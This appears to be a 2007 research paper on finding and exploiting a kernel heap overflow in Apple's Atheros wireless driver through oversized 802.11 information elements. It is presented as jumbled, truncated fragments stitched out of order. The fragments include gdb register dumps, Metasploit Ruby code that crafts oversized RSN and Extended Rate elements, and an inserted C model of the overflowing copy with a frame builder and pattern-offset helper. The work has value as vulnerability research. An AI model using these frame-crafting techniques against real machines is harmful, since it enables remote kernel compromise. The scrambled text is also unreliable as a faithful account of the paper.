OS X Kernel-mode Exploitation in a Weekend
September, 2007
David Maynor
[email protected]
http://www.erratasec.com/
#5 0x008c7303 in sta_add ()
#6 0x008bccb9 in ieee80211_add_scan ()
#7 0x008cd799 in ieee80211_recv_mgmt ()
#8 0x008ddbd9 in ath_recv_mgmt ()
#9 0x008ce9a5
Tracking down the packet that crashes a wireless driver can be frustrating because it's not necessarily the last packet to be received or transmitted.
processed when the information is needed for a scan. OS X produces a new scan every five minutes. As such, the machine may take up to five minutes to cra
Things I Wish Google told me: kernel core dumps on Intel are broken
The core kernel dumping functionality on the Intel architecture appears to be brok
Chapter 4
Debugging the Crash
One of the many benefits of remote kernel debugging is the ability to view a stack back trace with symbol information. The v
Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard
[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32
Aug 5 18
> if $ecx > 0x100
> x/20x $ecx
> end
> continue
> end
Every time this breakpoint is hit it will dump 20 words (x/20x) of memory starting at the address in ECX, provided ECX is above 0x100, and then cont
much as possible or one will be stuck typing the same commands repeatedly. On the target machine, the command to create the symbols for AirPortAtheros5
Chapter 5
Analyzing Madwifi
The madwifi source code shows that most of the crashes occur while iterating over the scan cache stored in a variable known a
*/
struct ieee80211_scan_entry {
	u_int8_t se_macaddr[IEEE80211_ADDR_LEN];
	u_int8_t se_bssid[IEEE80211_ADDR_LEN];
	u_int8_t se_ssid[2
Abstract
Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, th
0x008f3190 in sta_add ()
2: x/i $eip  0x8f3190 <sta_add+865>:	lea eax,[esi+63]
(gdb)
0x008f3193 in sta_add ()
2: x/i $eip  0x8f3193 <sta_add+868>
Chapter 6
Getting Code Execution
The result of this flaw is that many things beyond the Extended Rate buffer in the ieee80211 scan entry structure are corr
esi            0x41316341	1093755713
edi            0xaca0000	181010432
eip            0x1933de	0x1933de
eflags         0x10203	66051
cs             0x8	8
ss             0x10	16
ds             0x120010	1179664
es             0xc710010	2087321
A quick synopsis of this function's purpose is that a pointer to a pointer is passed as the address to copy data to. There is some sanity checking to s
To help better understand this, it is helpful to single-step through the sta_add function after sending an Extended Rate IE that is larger than 100 byt
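The flaw described above and the register-to-offset reading used later in the paper (the esi value in the crash register dump), as an added example that is not the paper's, Apple's or madwifi's code. The struct field names follow madwifi's ieee80211_scan_entry and its 15-byte IEEE80211_RATE_MAXSIZE, but the layout is assumed for illustration; the two copy routines are a model of the unchecked memcpy the paper describes beside a bounded version; the beacon body is constructed inline; and pattern_create only imitates Rex::Text.pattern_create. The unchecked copy writes into a byte arena we own so the overrun can be measured here rather than panicking a kernel.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IEEE80211_RATE_MAXSIZE  15   /* madwifi's fixed rate-buffer size */
#define IEEE80211_ELEMID_RSN    48   /* 0x30, the tag built by the paper's make_rsn */
#define IEEE80211_ELEMID_XRATES 50   /* Extended Supported Rates */

/* Simplified scan-cache entry (assumed layout, not the driver's): whatever
 * follows se_xrates is what an oversized Extended Rate IE tramples. */
struct scan_entry {
    uint8_t  se_macaddr[6], se_bssid[6], se_ssid[2 + 32];
    uint8_t  se_rates[IEEE80211_RATE_MAXSIZE], se_xrates[IEEE80211_RATE_MAXSIZE];
    uint8_t *se_rsn_ie;
};

/* Return the IE with the given tag, or NULL if absent or if a length byte runs past the body. */
static const uint8_t *find_ie(const uint8_t *ies, size_t len, uint8_t id)
{
    for (size_t off = 0; off + 2 <= len; off += 2 + ies[off + 1]) {
        if (off + 2 + ies[off + 1] > len) return NULL;
        if (ies[off] == id) return ies + off;
    }
    return NULL;
}

/* Vulnerable copy, modelled on the unchecked memcpy the paper describes: the count is
 * 2 + the attacker's IE length byte, never compared with the 15-byte buffer. The
 * destination is a caller-owned arena laid out like struct scan_entry. */
static void sta_add_xrates_unchecked(uint8_t *arena, const uint8_t *xrates)
{
    memcpy(arena + offsetof(struct scan_entry, se_xrates), xrates, 2 + xrates[1]);
}

/* Hardened copy: bounded by the buffer; returns -1 for an oversize IE so the
 * caller can drop the scan result, 0 when the IE fit. */
static int sta_add_xrates_checked(struct scan_entry *ise, const uint8_t *xrates)
{
    size_t n = 2 + xrates[1];
    if (n <= IEEE80211_RATE_MAXSIZE) { memcpy(ise->se_xrates, xrates, n); return 0; }
    memcpy(ise->se_xrates, xrates, IEEE80211_RATE_MAXSIZE);
    ise->se_xrates[1] = IEEE80211_RATE_MAXSIZE - 2;   /* header reflects what was kept */
    return -1;
}

/* Cyclic "Aa0Aa1Aa2..." filler in the style of Rex::Text.pattern_create. */
static size_t pattern_create(uint8_t *out, size_t n)
{
    size_t i = 0;
    for (int a = 0; a < 26; a++) for (int b = 0; b < 26; b++) for (int c = 0; c < 10; c++) {
        if (i < n) out[i++] = (uint8_t)('A' + a);
        if (i < n) out[i++] = (uint8_t)('a' + b);
        if (i < n) out[i++] = (uint8_t)('0' + c);
        if (i >= n) return i;
    }
    return i;
}

/* Constructed beacon body: SSID "test", basic rates, an Extended Rate IE whose
 * length byte the attacker picks (filled with the pattern), then a minimal RSN IE. */
static size_t build_beacon_body(uint8_t *buf, size_t cap, uint8_t xrates_len)
{
    static const uint8_t head[] = { 0, 4, 't', 'e', 's', 't', 1, 4, 0x82, 0x84, 0x8b, 0x96 };
    static const uint8_t rsn[] = { IEEE80211_ELEMID_RSN, 2, 0x01, 0x00 };
    size_t off = sizeof head;
    if (cap < sizeof head + 2 + xrates_len + sizeof rsn) return 0;
    memcpy(buf, head, sizeof head);
    buf[off++] = IEEE80211_ELEMID_XRATES;
    buf[off++] = xrates_len;
    off += pattern_create(buf + off, xrates_len);
    memcpy(buf + off, rsn, sizeof rsn);
    return off + sizeof rsn;
}

/* Push one constructed frame through either copy routine and count the bytes written
 * past the end of se_xrates (0 = no overrun). -1: the hardened routine rejected the
 * IE without spilling; -2: the frame did not parse. */
static int overrun_bytes(uint8_t xrates_len, int hardened)
{
    union { struct scan_entry e; uint8_t raw[sizeof(struct scan_entry) + 256]; } a;
    uint8_t body[512];
    size_t len = build_beacon_body(body, sizeof body, xrates_len), i;
    const uint8_t *xr = find_ie(body, len, IEEE80211_ELEMID_XRATES);
    int rc = 0, spilled = 0;
    if (xr == NULL) return -2;
    memset(&a, 0, sizeof a);
    if (hardened) rc = sta_add_xrates_checked(&a.e, xr);
    else sta_add_xrates_unchecked(a.raw, xr);
    for (i = offsetof(struct scan_entry, se_xrates) + IEEE80211_RATE_MAXSIZE; i < sizeof a.raw; i++)
        spilled += a.raw[i] != 0;
    return rc < 0 && spilled == 0 ? -1 : spilled;
}

/* Map a register seen at the crash back to an offset in the injected pattern,
 * e.g. the paper's esi=0x41316341 is "Ac1A" in memory order. -1 if not found. */
static long pattern_offset(uint32_t reg)
{
    uint8_t pat[1024], needle[4];
    size_t n = pattern_create(pat, sizeof pat);
    for (int i = 0; i < 4; i++) needle[i] = (uint8_t)(reg >> (8 * i));
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}
```

With a 223-byte Extended Rate IE, overrun_bytes(223, 0) reports 210 bytes written past se_xrates (225 copied into a 15-byte buffer), while overrun_bytes(223, 1) returns -1 with nothing spilled; an 8-byte IE fits either way. In the real driver the bytes past the buffer are other scan-entry fields and whatever the allocator placed next, which is why the paper sees pointers and eventually EIP taken from the pattern; pattern_offset(0x41316341) decodes the esi value from the register dump to offset 63 in such a pattern.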
def make_rsn
  # RSN IE: tag 0x30, one length byte, then a 223-byte cyclic pattern as the body
  rsn_data = Rex::Text.pattern_create(223)
  rsn_frame = "\x30" + rsn_data.length.chr + rsn_data
  return rsn_frame
end
And the associated
eflags         0x216	534
cs             0x8	8
ss             0x10	16
ds             0x10	16
es             0x190010	1638416
fs             0xc8c0010	210501648
gs             0x48	72
(gdb) stepi
0x008f5231 in ieee80211_saveie ()
2: x/i $
#1 0x008e977c in scan_next ()
Previous frame inner to this frame (corrupt stack?)
(gdb)
As can be seen above, the kernel attempted to execute an instruc
# crashes often occur in the following locations so they are blanked
xrate_build[67, 2] = "\x00\x00"
xrate_build[71, 4] = "\x00\x00\x00\x00"
eip            0x931f2b	0x931f2b <chanflags+11>
eflags         0x246	582
cs             0x8	8
ss             0x10	16
ds             0x10	16
es             0xa4810010	-1535049712
fs             0x10	16
gs             0x12260048	304480328
(gdb
Chapter 1
Introduction
OS X has a strange place in the hearts and the minds of the research community. Security researchers, like most other users, enjo
Chapter 7
Acknowledgements
The author would like to thank a few different people for the massive amount of help. Jon Ellch taught me how to do wireless in
Chapter 8
Conclusion
This paper has given a quick walk-through of a real vulnerability in Apple's wireless driver in terms of discovery and exploitatio
BackTrack2 is used because it includes many special 802.11 drivers that are capable of raw packet injection, a feature that most wifi drivers (frust
Chapter 2
Vulnerability Discovery
One of the major staples in a researcher's toolbox is binary analysis (where "binary" refers to compiled software code)
Things I wish Google Told me: Disassembling OS X binaries
Apple provides tools that support the manipulation of universal binaries which are capable of
0xc67ba50 : 0x8c923d (0x48 0x1 0 0x1e200010 0xc670010)
0xc67bad4 : 0x8c7303 (0x371787c 0x1e202d0d 0x8 0x5)
0xc67bb24 : 0x8bccb9 (0x3699804 0xc67bc8c 0x1
dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000
dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000
Kernel version:
Darwin Kernel Ver
Chapter 3
The Flaw
Standard exploit development techniques rarely work well when applied to kernel-level vulnerabilities. The kernel environment is muc